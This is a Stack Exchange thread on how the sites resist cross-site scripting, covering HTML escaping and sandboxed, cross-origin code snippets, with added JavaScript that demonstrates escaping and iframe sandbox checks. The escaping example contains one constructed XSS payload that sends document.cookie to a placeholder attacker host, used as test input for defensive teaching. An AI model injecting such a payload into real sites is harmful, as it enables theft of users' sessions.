It seems to me that because Users can post questions and comments in them with HTML markup (possibly <script>
tags), Stack Exchange sites would be very exposed to XSS attacks. How do they protect from this?

- What research have you done? Where have you looked, to understand how Stack Exchange builds HTML pages from markup? (It's well documented that Stack Exchange uses Markdown.) Where have you looked to understand how Markdown avoids XSS? (Hint: it's explained here on this site.) Doing a lot of research before asking, and showing us in the question what research you've done, helps us give you better, more focused answers and makes for better questions. – D.W. Jan 30 '15 at 23:47
- Have you *tried* putting a script tag in a post? <- That's what happens when you do – Ajedi32 Jan 31 '15 at 18:43
- @Ajedi32 it's what he is asking for. How is StackExchange allowing _some_ HTML while avoiding XSS? – rev Jan 31 '15 at 18:48
- @AcidShout My comment there was mostly in response to the remark about "possibly ` – Ajedi32 Jan 31 '15 at 21:33
2 Answers
For general comments, the script tags are properly escaped, so that it's just interpreted as text instead of as actual code. In this case, that sort of thing is handled via something known as HTML encoding, where your `<script>` tag would get turned into `&lt;script&gt;` and rendered as a text string instead of interpreted as code.
That said, StackOverflow has worked on a new feature that allows executable javascript in peoples' answers: http://blog.stackoverflow.com/2014/09/introducing-runnable-javascript-css-and-html-code-snippets/
Some of the security points from the article I want to highlight:
Are Stack Snippets Safe?
Yes, as much as the web in general is safe. You are not in any more danger than you are when browsing any site with JavaScript enabled. With that said, the snippets are running client code in your browser, and you should always exercise caution when running code contributed by another user. We isolate snippets from our sites to block access to your private Stack Exchange data:
- We use HTML5 sandboxed iframes in order to prevent many forms of malicious attack.
- We render the Snippets on an external domain (stacksnippets.net) in order to ensure that the same-origin policy is not in effect and to keep the snippets from accessing your logged-in session or cookies.
Like all other aspects of our site, Stack Snippets are ultimately governed by the community. Because users can still write code that creates annoying behaviors like infinite loops or pop-ups, we disable snippets on any post that is heavily downvoted (scoring less than -3 on Stack Overflow, -8 on Meta). If you see bad code that you think should be disabled, downvote the post. If you see code that is intended to be harmful (such as an attempt at phishing), you should flag it for moderator attention.
- HTML5 is the safest way to do anything on the web today, it even replaces most web players. – Virusboy Jan 31 '15 at 00:23
- Obviously, if you aren't using an HTML5 supporting browser, you're screwed anyway. – bjb568 Jan 31 '15 at 17:42
- HTML5 doesn't mitigate XSS vulnerabilities like the type mentioned in the original question. Competent developers do. – Greg Feb 02 '15 at 17:06
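The cross-origin, sandboxed embedding that the quoted blog post describes, as an added example. This is not Stack Exchange's code: the snippet host name, the URL layout and the exact set of sandbox tokens are assumptions made for the illustration; the two isolation properties it enforces (a different origin, and a sandbox without `allow-same-origin`) are the ones the post relies on.

```javascript
// Added illustration, not Stack Exchange's code: embedding user-authored
// runnable snippets the way the quoted blog post describes, in an HTML5
// sandboxed iframe served from a separate origin. The host names and the
// URL layout are assumptions made for this example.
const SITE_ORIGIN = "https://stackoverflow.com";        // the site holding the user's session
const SNIPPET_ORIGIN = "https://stacksnippets.example"; // assumed stand-in for the snippet host

// Capabilities granted to the snippet frame. "allow-same-origin" is
// deliberately absent: without it the frame gets an opaque origin, so the
// snippet cannot even read the snippet host's own storage, and the HTML
// spec warns that allow-scripts together with allow-same-origin lets a frame
// that is same-origin with its embedder strip its own sandbox attribute.
const SNIPPET_SANDBOX = ["allow-scripts", "allow-modals"];

// Minimal attribute-value escaper so that a snippet id cannot break out of
// the quoted attributes of the iframe tag built below.
function escapeAttr(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Return the list of isolation problems with a proposed embed (empty when it
// is acceptable). The rules are this example's policy, encoding the two
// properties the blog post relies on: a separate origin, and a sandbox the
// snippet cannot escape or abuse to navigate the page.
function validateSnippetEmbed(snippetUrl, sandboxTokens) {
  const problems = [];
  const origin = new URL(snippetUrl).origin;
  if (origin === SITE_ORIGIN) {
    problems.push("snippet is served from the site origin, so the same-origin policy would hand it the user's session");
  }
  if (sandboxTokens.includes("allow-same-origin")) {
    problems.push("allow-same-origin keeps the frame's real origin; combined with allow-scripts it can remove the sandbox");
  }
  if (sandboxTokens.includes("allow-top-navigation")) {
    problems.push("allow-top-navigation would let the snippet redirect the whole page (phishing)");
  }
  return problems;
}

// Build the iframe markup for a stored snippet, refusing unsafe configurations.
function snippetIframe(snippetId, sandboxTokens = SNIPPET_SANDBOX) {
  const src = `${SNIPPET_ORIGIN}/js?id=${encodeURIComponent(snippetId)}`;
  const problems = validateSnippetEmbed(src, sandboxTokens);
  if (problems.length > 0) {
    throw new Error("refusing to embed snippet: " + problems.join("; "));
  }
  const sandbox = sandboxTokens.join(" ");
  return `<iframe sandbox="${escapeAttr(sandbox)}" src="${escapeAttr(src)}"></iframe>`;
}
```

Note that the sandbox attribute and the separate origin do different jobs: the origin keeps the site's cookies and storage out of the snippet's reach even if the sandbox were misconfigured, while the sandbox (no `allow-same-origin`, no `allow-top-navigation`) keeps the snippet from removing its own restrictions or navigating the embedding page.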
This is done by sanitizing data that is input by users and converting it to a safe format for displaying on the screen. In essence you take the user input and convert special characters (<, >, /, \, etc.) into HTML entities, which renders them harmless for displaying on a web page.

- "Escaping" is a better term than "sanitizing". The latter gives a false impression that some bad input is discarded, and therefore I never use that word. – 200_success Jan 31 '15 at 23:36
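The HTML encoding step that both answers describe (escaping user text so the browser shows a `<script>` tag as a string rather than running it), as an added example written for this page rather than taken from either answer. It escapes the five characters the HTML parser assigns meaning to in text and attribute contexts; `/` and `\` are not HTML metacharacters, so they are left alone. The post body and display name used as input are constructed for the example, and the `attacker.example` host is a placeholder.

```javascript
// Added illustration, not code from either answer: HTML escaping of
// user-supplied text before it is placed in a page. The post body and
// display name fed in below are constructed inputs for this example.
const ENTITY_BY_CHAR = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};
const CHAR_BY_ENTITY = Object.fromEntries(
  Object.entries(ENTITY_BY_CHAR).map(([ch, ent]) => [ent, ch]),
);

// Replace every character the HTML parser treats as markup with its entity.
// "&" must be included so that input such as "&lt;" cannot be decoded back
// into a real "<" by the browser; the quote characters matter once the
// output is placed inside an attribute value.
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => ENTITY_BY_CHAR[ch]);
}

// The inverse for the five entities above. Escaping is reversible: nothing
// from the input is discarded, which is why "escaping" describes this step
// more accurately than "sanitizing".
function unescapeHtml(html) {
  return String(html).replace(/&(?:amp|lt|gt|quot|#39);/g, (ent) => CHAR_BY_ENTITY[ent]);
}

// How a post body would be emitted if the renderer trusted the user: the
// markup is copied into the page and the browser executes it.
function renderPostUnsafe(body) {
  return `<div class="post-body">${body}</div>`;
}

// The escaped version: the same characters reach the page, but as text.
function renderPostSafe(body) {
  return `<div class="post-body">${escapeHtml(body)}</div>`;
}

// Attribute context: escape AND quote. With an unquoted attribute a space in
// the input would start a new attribute even though < and > are escaped.
function renderAuthor(displayName) {
  const safe = escapeHtml(displayName);
  return `<a href="/users" title="${safe}">${safe}</a>`;
}

// True if the rendered fragment still contains something the browser would
// parse as a tag, i.e. escaping failed somewhere. Only the body is checked,
// not the wrapper element the renderer itself emits.
function bodyContainsMarkup(rendered) {
  const inner = rendered.replace(/^<div class="post-body">/, "").replace(/<\/div>$/, "");
  return /<[!\/a-zA-Z]/.test(inner);
}

// Constructed sample input: a post that tries to leak the reader's cookies.
const constructedPost =
  'Why does this fail? <script>fetch("https://attacker.example/?c=" + document.cookie)</script>';
```

Running `bodyContainsMarkup(renderPostUnsafe(constructedPost))` gives `true` and the same check on `renderPostSafe(constructedPost)` gives `false`; the text of the script tag still appears on the page, only as characters. Escaping is context-specific: the table above is right for HTML text and quoted attribute values, but text placed inside a `<script>` block, a URL, or a CSS value needs a different encoder.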